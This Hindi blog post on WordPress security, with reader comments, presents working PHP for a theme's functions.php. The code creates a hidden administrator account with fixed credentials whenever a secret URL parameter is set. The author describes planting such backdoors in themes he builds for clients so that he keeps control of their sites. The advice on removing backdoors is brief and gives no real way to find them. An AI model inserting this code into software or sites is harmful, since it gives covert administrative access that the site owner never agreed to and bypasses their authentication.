WordPress Admin Access Backdoor Create/Delete Secure Kaise Kare
आज हम सीखेंगे की WordPress Website Secure Kaise Kare कैसे आप WordPress admin access backdoor create या delete कर सकते हो. WordPress admin access backdoor एक ऐसा security loophole है जिसकी help से आपके WordPress blog में administrator account create करके access किया जा सकता है. WordPress Tutorial in Hindi
मैं ये post बहुत दिनों से लिखने की सोच रहा था लेकिन मुझे डर था और शायद अब भी है की कुछ लोग इस post का गलत use कर सकते हैं लेकिन फिर मैंने सोचा की की जिन blogger brothers को WordPress admin access backdoor के बारे में नही पता शायद वो backdoor के victim हो सकते हैं.
इसलिए मैंने इस post WordPress admin access backdoor कैसे create और delete करते हैं को लिखने का फैसला किया. बैसे ये जरुरी नही की गलत चीज को गलत काम के लिए ही use करें ऐसे ही आप WordPress admin access backdoor को अपने blog के साथ गलत होने से बचने के लिए या किसी सही काम के लिए भी कर सकतें हैं.
Note: ये post सिर्फ educational और learning purposes के लिए है. मैं किसी को भी अपनी या किसी और के WordPress blog में backdoor का use करना recommend नही करता और अगर कोई इस post का गलत उपयोग (against the law) करता है तो gyanians author उसका जिम्मेदार नही होगा.
Table of Contents
Backdoor Kya Hai
Backdoor का मतलब तो आप इसके Hindi अर्थ यानी “पीछे का दरवाजा” से समझ गये होंगे जैसे हम Hindi movies में देखते आये है की गलत लोग किसी घर में घुसने के लिए पीछे के दरबाजा का use करते है ठीक इसी तरह backdoor एक method है जिसका use किसी site में normal authentication को bypass करके access करने के लिए किया जाता है.
Backdoor बहुत बड़ा topic है क्योंकि इसका use अलग-अलग चीजो जैसे की site, apps, server इत्यादि में अलग-अलग तरीके से जैसे की separate program, hidden piece of code या hardware feature की help से illegally access करने के लिए किया जाता है.
इस post में हम सिर्फ WordPress admin access backdoor के बारे में सीखेंगे यानी कैसे कोई backdoor की help से आप normal authentication को bypass करके WordPress dashboard में hidden access कर सकता है और कैसे आप अपने WordPress blog में backdoor को find करके उसे delete कर सकते हो.
आपके WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है.
इसलिए कभी भी pirated premium WordPress themes and plugins को use नही करना चाइये और न ही कभी किसी untrusted person को अपने WordPress dashboard में किसी भी तरह की help के लिए access देनी चाइये.
- Read: WordPress Admin Username Kaise Change Kare – 3 Methods
- Read: WordPress Blog Me Social Media Share Buttons Kaise Add Kare (Without Plugin)
- Read: Speed Up WordPress with PHP 7 – PHP Version Upgrade Kaise Kare?
WordPress Admin Account Backdoor Create Kaise Kare
जैसे मैंने ऊपर कहा था की किसी गलत चीज को आप सही काम के लिए भी use कर सकते हो ठीख ऐसे ही आप WordPress admin access backdoor को सही काम के लिए use कर सकते हो जैसे मैं इसे कब और क्यों use करता हूँ ये बताता हूँ.
मेरे साथ एक बार ऐसा हुआ की मैंने एक client के लिए theme design की और उन्होंने theme को अपने blog पर activate करने के बाद भी full payment नही किया और उन्होंने मेरे login information को भी WordPress से delete करके पूरा control अपने under में ले लिया.
WordPress Tutorial in Hindi
इस bad incident के बाद से ही मैंने अपनी design की हुई themes और plugins में backdoor setup करने लगा और इससे मेरा control भी रहता है और clients को कोई technical problem होने पर मेरा support भी मिल जाता है.
अगर आप भी एक easy WordPress admin access backdoor create करना चाहते हो तो नीचें दिए गये code को copy करके theme की functions.php file में सबसे नीचें paste कर दीजिये और update file button पर click करके changes को save कर दीजिये.
add_action('wp_head', 'gyanians_backdoor');
function gyanians_backdoor() {
if($_GET['backdoor'] == 'go') {
require('wp-includes/registration.php');
if(!username_exists('demoname')) {
$user_id = wp_create_user('demoname','demopass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}ऊपर दिया हुआ code एक backdoor trigger है जिसे पहले आपको activate करना होगा उसके लिए आप browser में backdoor activation URL http://yoursite.com/?backdoor=go type करके enter करना होगा और enter करते ही administrator account create हो जायेगा.
Backdoor trigger activate हो जाने के बाद WordPress login page पर जाकर username field में demoname और password filed में demopass enter करके login कर सकते हो.
आप ऊपर दिए गये code में line no. 6 पर demoname और demopass की जगह अपनी मर्जी से कोई भी username और password choose कर सकते हो और ऐसे ही line no. 3 पर backdoor और go की जगह आप कुछ भी enter करके अपनी मर्जी से कोई भी backdoor activation URL create कर सकते हो.
WordPress Website Secure Kaise Kare
जैसा की मैंने ऊपर बताया की WordPress blog में admin access backdoor create होने का सबसे बड़ा reasons होता है pirated premium WordPress themes and plugins क्योंकि इनके अंदर backdoor code encrypted form में setup होता है.
जिसकी वजह से unauthorized user को आपके blog में access करने का backdoor मिल जाता है इसलिए मैं highly recommended करूँगा की कभी भी online download करके या किसी से भी pirated premium WordPress themes and plugins न लें और ना ही install करें.
क्योंकि WordPress admin access backdoor code encrypted form में WordPress की किसी भी file में setup किया जाता सकता है और created user को भी आपके WordPress dashboard में Users >> All users की list से hide किया जा सकता है.
इसके अलावा सबसे best तरीका है की आप अपने WordPress blog admin login URL change कर दें और अपने blog के database में admin user creation को ही disable कर दें.
- Read: Limit Login Attempts Ko WordPress Me Kaise Add Kare?
- Read: Two-Factor Authentication WordPress Login Me Kaise Add Kare?
- Read: WordPress Blog Directory Browsing Disable Kaise Kare?
आशा करता हूँ की आपको ये WordPress Admin Access Backdoor Kaise Create Ya Delete Kare या WordPress Website Secure Kaise Kare का WordPress Tutorial in Hindi post पसंद आई होगी. अगर आपको इस post से related कोई सवाल या सुझाव है तो नीचे comment करें और इस post को अपने दोस्तों के साथ जरुर share करें.
- Machine Learning क्या है – Algorithm, Salary की पूरी जानकारी
- Line App क्या है – बारे में पूरी जानकारी | Line App Download
- Public App क्या होता है- Video Download |Public App Download
- Josh App क्या है – बारे में जानकारी | Josh App Download Apk
- Khabri App क्या है – Khabri App से पैसे कैसे कमाए | Khabri App Download
Sabse pehle to aapne bahut aachi jankari share ki uske liye thanks….
Bhai kya use back door code har theme mai hota hai. Hum kaise check kare ki ye code hamari theme mai h ya nahi.. or agar hai to isko kaose remove kare
Thanks for compliment … and har theme me backdoor code nhi hota hai sirf nulled themes and plugins me backdoor code hone ke chances hote hai and sirf kuch preimum plugins se hi backdoor code ko detect kia ja skta hai…
Very interesting post bade bhai….
But maine ye apni site par try kiya to ye work to kiya lekin.. Admin area me Sirf 2 hi options dikhe
(1st.. Dashboard
(2nd.. Profile ka…
Iska Matlab jo user add hua as a subscriber add hua then ise kaise thik kare..?.
Thanks for compliment .. and ye probelm isliye hai kyonki aapki hosting se admin backdoor disable hoga or ye jyadatr sabhi hosting me hota hai … lekin agr aap ise check karna chahte ho to testing server par karen or aapke server pr use karne ke liye is code ko encrypted hona chaiye jo method mene isliye nhi btaya kyonki fir log iska jyada hi galt use kar skten hain.
Okay Neel bhai thank you…. For reply
थैंक यू भी बहुत अच्छा पोस्ट शेयर किया, धन्यवाद
My pleasure brother .. keep visiting ~
Bahut hi upayogi post hai har ek WordPress users ke liye thanks for the sharing this valuable post.
My pleasure brother .. keep visiting ~
very Nice post ,Security se related aur post kare sirji
Thanks for compliments and keep visiting for updates ~
internet par itne sare hindi blog hai par kya aapko pata hai sabse jyada comments mein aapke blog par karta hu pata nahi aisa kyun hai brother….aapme aur aapke blog me kuch to khash hai….
Thanks brother ~